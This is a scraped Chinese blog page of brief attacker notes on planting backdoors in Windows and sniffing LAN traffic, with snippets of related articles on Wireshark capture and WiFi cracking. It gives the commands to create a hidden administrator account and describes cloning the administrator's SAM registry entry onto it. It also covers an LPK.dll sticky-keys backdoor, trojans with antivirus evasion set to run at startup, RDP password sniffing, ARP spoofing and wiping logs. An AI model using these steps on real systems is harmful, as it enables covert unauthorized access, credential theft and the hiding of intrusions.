windows留后门与局域网抓包

嗅探3389密码
wireshark
cain

windows安装后门:
账号后门:
net user
net user 账号$ 密码 /add 加$符变为隐藏账号
net localgrop administrators 账号 /add
net user 账号 /del 删除账号

系统自带账号改密码  记录名字
regedit   打开注册表
HKEY_LOCAL_MACHINE->SAM->SAM
右键设置权限   刷新   users->name  找到账号  看类型   上面找到该账号
先找到管理员(administrator)账号  双击类型为REG_BINATY第一个  所有数据复制
粘贴进后门账号
关闭sam文件夹权限

LPK后门:
生成lpk.dll
键值为ascii码,2键同时按下2个键,3键同时按下三个键 生成
exe可执行程序触发
五次shift,同时按下设置的热键,弹出密码框,输入密码登录
×××后门:
远控上线+×××免杀,×××丢进开机启动项
部分带压力测试远控可进行DDOS×××
windows清理痕迹可下载清理工具
允许外连:
***工具:navicat premium essentials
不允许外连:
***脚本

信息搜集:
nmap
zenmap
scanport
ntscan
arp -a
net view 查看其它电脑主机名
查看ip:
ipconfig

getpass

流量监听:
wiresharke
cain
sniffer pass

原文地址:http://blog.51cto.com/3945465/2150134

时间: 2024-10-16 02:31:21

windows留后门与局域网抓包的相关文章

wireshark实战之局域网抓包分析

Wireshark.它是一款本地监听数据的大杀器,弊端是只能监听本地的数据,有什么办法可以让局域网中的流量都从本机走呢? 第一ARP嗅探,劫持网关,再本地抓包. 第二交换机镜像端口,在路由或者交换机处设置,复制一份数据到指定机子端口.第三Ap一个无线,让他们连接,然后再抓包.第一种方法不用考虑,第二种方法因为企业级路由才有镜像端口功能,我等屌丝用的TP-LINK无这个功能.所以只能考虑第三种方法.  首先建立一个WIFI热点,懒得用WIN7自带的虚拟WIFI功能.(PS:window 7有一个"

windows和linux下的抓包工具

Linux 抓包工具 tcpdump 示例 tcpdump  -i   bond0  host 10.70.11.182 -w  ./sms.cap windows抓包工具 常用静态式 ip.dst==211.137.124.14 or ip.src==211.137.124.14 原文地址:https://www.cnblogs.com/veryvalley/p/8447888.html

如何在Windows系统上用抓包软件Wireshark截获iPhone等网络通讯数据

http://www.jb51.net/os/windows/189090.html 今天给大家介绍一种如何在Windows操作系统上使用著名的抓包工具软件Wireshark来截获iPhone.iPad等iOS设备或Android设备的网络通讯数据的方法 不管是iPhone的iOS还是Android系统上开发的应用App基本上都会需要使用网络通讯来传输数据.开发者有的时候可能会需要通过抓包的方式来了解应用具体在传输些什么数据,以及数据是否正确.今天给大家介绍一种如何在Windows操作系统上使用

Wireshark和TcpDump抓包分析对比

常见的抓包分析工具有:微软的Network Monitor和Message Analyzer.Sniff.WSExplorer.SpyNet.iptools.WinNetCap.WinSock Expert.Wireshark和linux的tcpdump等工具 今天,做了实验测试就对比分析其中的两款,其他的大家可以百度谷歌测试一哈^_^ 1. Wireshark与tcpdump介绍 Wireshark是一个网络协议检测工具,支持Windows平台和Unix平台,我一般只在Windows平台下使用

【转】Fiddler抓包指南:结合Proxifier工具

本文转自:https://blog.csdn.net/china_jeffery/article/details/93000824 本文介绍如何使用Fiddler抓取HTTP和HTTPS协议的包,同时还介绍了如何结合Proxifier工具来处理Filddler无法抓取到包的情况. 一.HTTP基本抓包 Fiddler官网下载安装:https://www.telerik.com/fiddler 对浏览器的抓包,就不再赘述,打开这个软件就一目了然了,本文主要讲对普通Windows桌面应用程序的抓包,

Mac下也能用抓包工具Fiddler

一直以来都是在Windows底下工作,对于抓包工具,自然而然当属Fiddler最最出色.不过Fiddler是在.Net runtime环境下运行的,所以想要在Mac下使用,有些困难. 在试过了Charles.Rythem.TinyProxy和NProxy这些抓包工具后,我依然苦恼,它们有的需要支付昂贵的费用,有的只支持本机网页请求代理,而有些界面只有文本模式,这让我无法适从. 直到去年10月份(2016年10月),Telerik官网上悄然地放上了Fiddler的OSX版,这让我欣喜若狂,赶紧来尝

用Wireshark抓包来揭开ftp client GG和ftp server MM的勾搭内容并用C代码来简要模拟实现Windows自带的ftp client

前面, 我们玩过http, 颇有点意思, 在本文中, 我们继续来玩ftp(file transfer protocol).   http和ftp都是建立在tcp之上的应用层协议, 无论他们怎么包装, 怎么装bigger, 最终还是基于tcp端到端传输的.本文主要分为两个部分: 一. 用Wireshark抓包来揭开ftp client GG和ftp server MM的勾搭内容.二.用C代码来简要模拟实现Windows自带的ftp client. 说明, 本文中的实验, 我用了两台电脑, 分别是p

windows本地抓包

方法一: wireshark是无法抓取到数据包的,需要通过设置才可以. 具体方法如下: ①:以管理员身份运行cmd ②:route add 本机ip mask 255.255.255.255 网关ip 还需要设置路由器(不知道咋设置,知道的仁兄能否告之一下)才能利用wireshark抓本地包. 方法二: rawcap可以抓取本地包,保存的文件可以使用wireshark分析.win7环境下测试是行的. 下载地址:http://www.netresec.com/?page=RawCap 需要注意的是

做一个WINDOWS下破解WIFI。不需要Linux抓包!

搬家了,没网了.没有WIFI了! 想破解,不过没有Linux环境,不能抓包!破解! 于是自己动手开工! 在windows 下直接破解.貌似国内 还没看到.如果有了,那么请各位童鞋 提醒一下.赶急 要使用啊!! 最终: 不过有点问题,如果路由器 启用混淆模式,那么如何拿到真实的握手协议呢? 做一个WINDOWS下破解WIFI.不需要Linux抓包!